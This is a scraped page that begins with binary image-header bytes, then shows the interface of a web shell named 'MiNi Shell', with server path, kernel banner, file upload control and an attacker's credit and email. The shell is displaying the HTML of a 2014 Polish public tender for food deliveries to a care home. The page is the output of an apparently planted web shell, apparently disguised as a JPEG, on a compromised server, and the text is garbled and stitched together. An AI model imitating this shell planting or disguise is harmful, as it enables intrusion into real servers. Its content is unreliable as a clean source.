JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140528/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140528/179544-N-2014.html

<p class="kh_header"><b>Błonie: Przedmiotem zamówienia są stałe, powtarzające się dostawy artykułów żywnościowych do magazynu Zamawiającego według podziału na zadania (części): - Zadanie nr 1 - dostawa mięsa, wędlin, drobiu i wyrobów drobiarskich; Zadanie nr 2 - dostawa produktów mleczarskich; Zadanie nr 3 - dostawa owoców cytrusowych; Zadanie nr 4 - dostawa różnych artykułów spożywczych; Zadanie nr 5 - dostawa pieczywa; Zadanie nr 6 - dostawa owoców i warzyw; Zadanie nr 7 - dostawa ryb; Zadanie nr 8 - dostawa jaj.</b><br>
<b>Numer ogłoszenia: 179544 - 2014; data zamieszczenia: 28.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Bramkach , ul. Północna 18, 05-870 Błonie, woj. mazowieckie, tel. 0-22 7256127, faks 0-22 7256066.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dpsbramki.org</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia są stałe, powtarzające się dostawy artykułów żywnościowych do magazynu Zamawiającego według podziału na zadania (części): - Zadanie nr 1 - dostawa mięsa, wędlin, drobiu i wyrobów drobiarskich; Zadanie nr 2 - dostawa produktów mleczarskich; Zadanie nr 3 - dostawa owoców cytrusowych; Zadanie nr 4 - dostawa różnych artykułów spożywczych; Zadanie nr 5 - dostawa pieczywa; Zadanie nr 6 - dostawa owoców i warzyw; Zadanie nr 7 - dostawa ryb; Zadanie nr 8 - dostawa jaj..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa mięsa, wędlin, drobiu i wyrobów drobiowych - Baleron odtłuszczony	kg	150
Baleron wędzony	kg	120
Baton drobiowy z kurczaka	kg	130
Boczek wędzony	kg	40
Filet pieczony z indyka	kg	50
Filet z piersi indyka	kg	50
Flaki wołowe 3 kg	kg	80
Golonka wieprzowa	kg	30
Karkówka b/k	kg	80
Kaszanka	kg	120
Kiełbasa biała	kg	40
Kiełbasa cytrynowa	kg	140
Kiełbasa dębicka	kg	90
Kiełbasa krakowska	kg	50
Kiełbasa krakowska podsuszana	kg	50
Kiełbasa parówkowa	kg	60
Kiełbasa podwawelska	kg	60
Kiełbasa szynkowa wieprzowa	kg	70
Kiełbasa szynkowa z indyka	kg	60
Kiełbasa zwyczajna	kg	190
Kiełbasa żywiecka	kg	100
Korpus z indyka	kg	50
Korpus z kurczaka	kg	250
Kości schabowe	kg	550
Kości wędzone	kg	30
Łopatka bez kości	kg	500
Łopatka pieczona	kg	100
Mięso wołowe b/k	kg	100
Mięso wołowe gulaszowe b/k	kg	100
Nogi wieprzowe	kg	30
Nogi z kurczaka całe	kg	450
Ogonówka	kg	200
Parówki cienkie	kg	200
Parówki drobiowe	kg	180
Pasztet drobiowy pieczony	kg	120
Pasztetowa drobiowa	kg	120
Piersi z kurczaka (filet)	kg	600
Polędwica drobiowa	kg	110
Polędwica sopocka	kg	100
Polędwica z warzywami	kg	150
Salceson włoski	kg	90
Schab bez kości	kg	250
Schab pieczony	kg	40
Słonina	kg	40
Szynka drobiowa	kg	100
Szynka gotowana	kg	100
Szynka wędzona	kg	120
Szynka wiejska	kg	100
Szynka z indyka	kg	120
Wątróbka drobiowa	kg	300
Żeberka paski	kg	300
Dostawa nabiału - Jogurt naturalny w kubku 370g	szt.	1400
Masło roślinne w kostce 250g	szt.	5300
Mleko 2% w folii - 1l	l.	7200
Ser biały chudy	kg	550
Ser żółty zawartość 13% tłuszczu	kg	400
Śmietana 30% - 1l	l.	30
Dostawa cytrusów - Banany	kg	200
Cytryny	kg	50
Dostawa różnych artykułów spożywczych - Ananasy w puszcze 565g	szt.	120
Aromaty 9 ml	szt.	120
Barszcz biały 66g	szt.	100
Bazylia 10g	szt.	150
Brzoskwinie 820g	szt.	120
Budyń bez cukru 60g	szt.	350
Budyń śmietankowy 60g	szt.	200
Chrzan 320g	szt.	100
Cukier 1kg	kg	1900
Cukier puder 0,5kg	szt.	40
Cukier waniliowy 32g	szt.	150
Cynamon 20g	szt.	200
Czosnek mielony 20g	szt.	120
Drożdże	Kg	5
Dżem niskosłodzony 280g	szt.	1200
Fasola czerwona konserwowa 400g	szt.	120
Fasola sucha Jaś 500g	szt.	200
Galaretka owocowa z cukrem 90g	szt.	200
Gałka muszkatołowa 20g	szt.	10
Groszek konserwowy 400g	szt.	300
Herbata granulowana 100g	Kg	180
Kakao 100g	szt.	150
Kasza gryczana 1kg	Kg	50
Kasza jęczmienna 1kg	Kg	100
Kasza manna 1kg	Kg	150
Kawa zbożowa 250g	szt.	70
Ketchup 500g min. 35% wkł. Koncentr.	szt.	140
Kisiel bez cukru 77g	szt.	500
Kisiel z cukrem 77g	szt.	500
Koncentrat pomidorowy 900g	szt.	200
Kukurydza konserwowa 400g	szt.	300
Kwasek cytrynowy 50g	szt.	50
Liście laurowe 10g	szt.	200
Majeranek 10g	szt.	100
Majonez 420g	szt.	100
Mak 1kg	Kg	15
Makaron krajanka gruba	Kg	250
Makaron muszelki 1kg	Kg	50
Makaron nitki 500g	Kg	200
Makaron rurki 1kg	Kg	50
Makaron świderki 1kg	Kg	200
Mąka pszenna typ 480 1kg	Kg	850
Mąka ziemniaczana 1kg	Kg	90
Musztarda 200g	szt.	100
Ocet 0,5l	szt.	50
Ogórki konserwowe 900g	szt.	100
Olej 1l	szt.	400
Oregano 10g	szt.	100
Papryka konserwowa 850g	szt.	100
Papryka mielona ostra 20g	szt.	20
Papryka mielona słodka 20g	szt.	20
Pieprz naturalny mielony 15g	szt.	520
Płatki jęczmienne	Kg	100
Płatki kukurydzane 	Kg	150
Płatki owsiane 1kg	Kg	150
Płatki żytnie	Kg	30
Proszek do pieczenia 36g	szt.	250
Przyprawa do drobiu 20g	szt.	80
Przyprawa do ryb 20g	szt.	100
Rodzynki 200g	szt.	70
Ryż 1kg	Kg	250
Sałatka szwedzka 850g	szt.	100
		
Sól 1kg	Kg	250
Szczawa konserwowy 320g	szt.	100
Śliwki suszone 100g	Kg	5
Tymianek 10g	szt.	110
Vegetta 200g (lub równoważne)	szt.	400
Wiórki kokosowe 200g	szt.	35
Ziele angielskie 20g	szt.	180
Zupa grzybowa 37g	szt.	300
Zupa ogonowa 62g	szt.	350
Zupa pieczarkowa 44g	szt.	300
Żelatyna 50g	szt.	70
Dostawa pieczywa - Bułka paryska 450g	szt.	7500
Bułka kajzerka 0g	szt.	300
Bułka słodka 100g	szt.	200
Chleb pszenno-żytni 500g	szt.	4500
Chleb razowy 500g	szt.	1600
Dostawa warzyw i owoców - Botwina	pęczek	60
Buraki czerwone	kg	200
Brokuły	kg	150
Cebula	kg	400
Cukinia	kg	50
Czosnek główki	główki	50
Fasola szparagowa	kg	50
Gruszki	kg	500
Jabłka	kg	1900
Kalafior	kg	100
Kapusta biała	kg	100
Kapusta czerwona	kg	50
Kapusta kiszona	kg	150
Kapusta włoska	kg	50
Kapusta pekińska	kg	100
Koper	pęczek	400
Marchew	kg	1200
Natka pietruszki	pęczek	300
Ogórki kiszone	kg	300
Ogórki świeże	kg	250
Papryka świeża	kg	80
Pieczarki	kg	80
Pietruszka korzeń	kg	500
Pomidory	kg	400
Por	kg	310
Rabarbar	kg	150
Rzodkiewka	pęczek	100
Truskawki	kg	100
Sałata masłowa	szt.	400
Sałata lodowa	szt.	80
Seler	kg	400
Szczypior	pęczek	250
Śliwki	kg	150
Wiśnie	kg	100
Ziemniak młody	kg	150
Ziemniaki	kg	10000
Dostawa ryb - Panga biała filet mrożony b/sk	kg	500
Ryba wędzona	kg	250
Śledź płaty	kg	150
Mintaj filet mrożony	kg	100
Dostawa jaj - Jaja (65-70g)	szt.	22000.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.10.00.00-9, 15.50.00.00-6, 03.22.22.00-5, 15.81.00.00-9, 03.22.12.00-8, 15.20.00.00-0, 03.14.25.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie wykazania spełnienia przez Wykonawcę warunków udziału w postępowaniu, o których mowa w art. 24 ust. 1 ustawy z dnia 29.01.2004 roku - Prawo Zamówień Publicznych, należy przedłożyć: oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 według wzoru określonego w załączniku nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Należy przedłożyć wykaz wykonanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia dostaw (w przypadku świadczeń okresowych lub ciągłych również wykonanych), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia załącznik nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego, Wykonawcy zobowiązani są załączyć do oferty dokument potwierdzający stosowanie wdrożonego systemu HACCP albo oświadczenie Wykonawcy potwierdzające stosowanie zasad dobrej praktyki higienicznej (GHP)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dpsbramki.org<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Bramkach ul. Północna 18, 05-870 Błonie, pokój nr 17..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2014 godzina 11:00, miejsce: Dom Pomocy Społecznej w Bramkach ul. Północna 18, 05-870 Błonie, pokój nr 17 (sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com